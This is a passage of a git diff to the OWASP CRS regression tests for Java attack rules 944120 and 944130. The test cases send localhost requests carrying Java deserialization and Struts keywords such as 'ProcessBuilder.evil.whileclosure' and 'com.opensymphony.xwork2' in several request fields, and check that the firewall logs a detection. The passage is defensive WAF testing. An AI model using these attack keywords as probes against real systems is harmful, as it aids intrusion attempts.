"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + 
output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-107
+ desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.prototypeserializationfactory
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-108
+ desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-109
+ desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-110
+ desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+
dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-111
+ desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-112
+ desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-113
+ desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.prototypeserializationfactory"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-114
+ desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-115
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-116
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.prototypeserializationfactory": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-117
+ desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.prototypeserializationfactory": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-118
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data;
boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.prototypeserializationfactory
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-119
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.prototypeserializationfactory
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-120
+ desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.whileclosure"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-121
+ desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+
port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.whileclosure=test"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-122
+ desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=ProcessBuilder.evil.whileclosure
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-123
+ desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: ProcessBuilder.evil.whileclosure=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-124
+ desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept:
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: ProcessBuilder.evil.whileclosure
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-125
+ desc: "XML element includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-126
+ desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944120\""
+ - test_title: 944120-127
+ desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-128
+ desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.whileclosure"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-129
+ desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "ProcessBuilder.evil.whileclosure"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-130
+ desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=ProcessBuilder.evil.whileclosure"
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-131
+ desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+
Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ {"test": "ProcessBuilder.evil.whileclosure"}
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-132
+ desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ {"ProcessBuilder.evil.whileclosure": "test"}
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-133
+ desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.whileclosure": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-134
+ desc: "Content-Type multipart/form-data json arg value includes keyword
ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/json
+
+ {"ProcessBuilder.evil.whileclosure": "test"}
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-135
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.whileclosure
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
+ - test_title: 944120-136
+ desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding:
"gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: |
+ -----------------------------thisissparta
+ Content-Disposition: form-data; name="payload"
+ Content-Type: application/xml
+
+ ProcessBuilder.evil.whileclosure
+ -----------------------------thisissparta--
+ output:
+ log_contains: "id \"944120\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
index 328162493b..b1f4961d45 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
@@ -1,9697 +1,8063 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944130.yaml" - description: "Positive tests for rule 944130" - tests: - - - test_title: 944130-0 - desc: "Argument test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-1 - desc: "Argument name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-2 - desc: "Cookie test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - 
version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-3 - desc: "Cookie name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-4 - desc: "Request header test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-5 - desc: "XML attribute value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id 
\"944130\"" - - - - test_title: 944130-6 - desc: "XML element value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-7 - desc: "Nested XML element value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-8 - desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-9 - desc: "Content-Type application/json arg value includes keyword 
com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-10 - desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-11 - desc: "Argument test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 